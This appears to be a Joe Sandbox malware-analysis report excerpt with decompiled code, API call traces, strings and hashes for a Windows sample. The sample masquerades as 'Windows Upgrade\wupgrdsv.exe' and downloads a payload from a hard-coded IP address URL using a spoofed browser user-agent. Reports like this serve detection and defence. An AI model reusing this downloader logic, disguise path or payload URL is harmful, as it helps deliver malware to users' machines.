                                                                                                                                                                                                                                                                                    0x000214c6
                                                                                                                                                                                                                                                                                    0x000214ce
                                                                                                                                                                                                                                                                                    0x000214d5
                                                                                                                                                                                                                                                                                    0x000214da
                                                                                                                                                                                                                                                                                    0x000214ce
                                                                                                                                                                                                                                                                                    0x0002148a
                                                                                                                                                                                                                                                                                    0x000214e2

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0002146E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00021400: ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 0002141A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00021400: wsprintfW.USER32 ref: 00021433
                                                                                                                                                                                                                                                                                      • Part of subcall function 00021400: PathFileExistsW.SHLWAPI(?), ref: 00021443
                                                                                                                                                                                                                                                                                      • Part of subcall function 00021360: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 0002137A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00021360: wsprintfW.USER32 ref: 00021393
                                                                                                                                                                                                                                                                                      • Part of subcall function 00021360: PathFileExistsW.SHLWAPI(?), ref: 000213A3
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 0002149D
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 000214B6
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 000214C6
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: GetTickCount.KERNEL32 ref: 000210B9
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: srand.MSVCRT ref: 000210C0
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 000210E0
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: rand.MSVCRT ref: 000210E6
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: rand.MSVCRT ref: 000210FA
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: wsprintfW.USER32 ref: 00021121
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00021137
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: InternetOpenUrlW.WININET(00000000,000214DA,00000000,00000000,00000000,00000000), ref: 00021163
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00021192
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 000211C5
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 000211F6
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: CloseHandle.KERNEL32(000000FF), ref: 00021205
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: Sleep.KERNEL32(000003E8), ref: 00021210
                                                                                                                                                                                                                                                                                      • Part of subcall function 000210B0: wsprintfW.USER32 ref: 00021229
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • %s\Windows Upgrade\wupgrdsv.exe, xrefs: 000214AA
                                                                                                                                                                                                                                                                                    • %userprofile%, xrefs: 00021498
                                                                                                                                                                                                                                                                                    • http://185.215.113.66/nxmr.exe, xrefs: 000214D0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.882368593.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882359979.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882391738.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882401431.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882407647.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_20000_150623101.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$wsprintf$EnvironmentExpandStrings$ExistsInternetPath$OpenSleeprand$CloseCountCreateHandleReadTickWritesrand
                                                                                                                                                                                                                                                                                    • String ID: %s\Windows Upgrade\wupgrdsv.exe$%userprofile%$http://185.215.113.66/nxmr.exe
                                                                                                                                                                                                                                                                                    • API String ID: 4099434391-1058588280
                                                                                                                                                                                                                                                                                    • Opcode ID: 11b5c302b7b3f7de14f6d33c136bca585f229317083735a054edea8297547026
                                                                                                                                                                                                                                                                                    • Instruction ID: dcc776c5b03b3e21e4285a1c784a1e1e6dde96541db178c544c015a77c21e1d9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11b5c302b7b3f7de14f6d33c136bca585f229317083735a054edea8297547026
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8F0FCB050033877E720F7A1BC86FFA33687B10705F404564B609C40C3EAB59699C6A5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 62 21400-2144b ExpandEnvironmentStringsW wsprintfW PathFileExistsW 63 21451 62->63 64 2144d-2144f 62->64 65 21453-21456 63->65 64->65
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00021400() {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				short _v1044;
                                                                                                                                                                                                                                                                                    				int _t9;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				ExpandEnvironmentStringsW(L"%systemdrive%",  &_v524, 0x104);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1044, L"%s\\Program Files (x86)",  &_v524);
                                                                                                                                                                                                                                                                                    				_t9 = PathFileExistsW( &_v1044); // executed
                                                                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x0002141a
                                                                                                                                                                                                                                                                                    0x00021433
                                                                                                                                                                                                                                                                                    0x00021443
                                                                                                                                                                                                                                                                                    0x0002144b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00021451
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 0002141A
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00021433
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00021443
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.882368593.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882359979.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882391738.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882401431.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.882407647.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_20000_150623101.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EnvironmentExistsExpandFilePathStringswsprintf
                                                                                                                                                                                                                                                                                    • String ID: %s\Program Files (x86)$%systemdrive%
                                                                                                                                                                                                                                                                                    • API String ID: 3337111443-1963301939
                                                                                                                                                                                                                                                                                    • Opcode ID: eb8a28c1327273537fe16d82266b7fd2505bb37883518a75860e71d3927612d3
                                                                                                                                                                                                                                                                                    • Instruction ID: fd93273f5b9b0ef0ba1108e283c5d66cee0ebacdf34369eb5448637da82e8b25
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb8a28c1327273537fe16d82266b7fd2505bb37883518a75860e71d3927612d3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5E065B154021CBBEB20DBA0BC89EE6736CA710704F444595EA1882051EAB5A6DDDBA5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.889431332.000000013F8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000000013F8B0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.889424083.000000013F8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.889453693.000000013F8CB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.889457964.000000013F8CC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.890250778.000000013FE16000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.890255749.000000013FE18000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.890323781.000000013FE21000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.890331763.000000013FE24000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.891257392.000000013FE25000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_13f8b0000_2465513676.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: e937fe1005736edc4141340613b6c0946c383bd46eb219c50031cd8ae7fc13cb
                                                                                                                                                                                                                                                                                    • Instruction ID: 8b9fb90b140307a0aa3b7ab3cec50abe3f7df548a40af811238532a89454701e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e937fe1005736edc4141340613b6c0946c383bd46eb219c50031cd8ae7fc13cb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7B0123090060CC4E3046F02D8423C832206308780F819025C40907363C67845424710
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%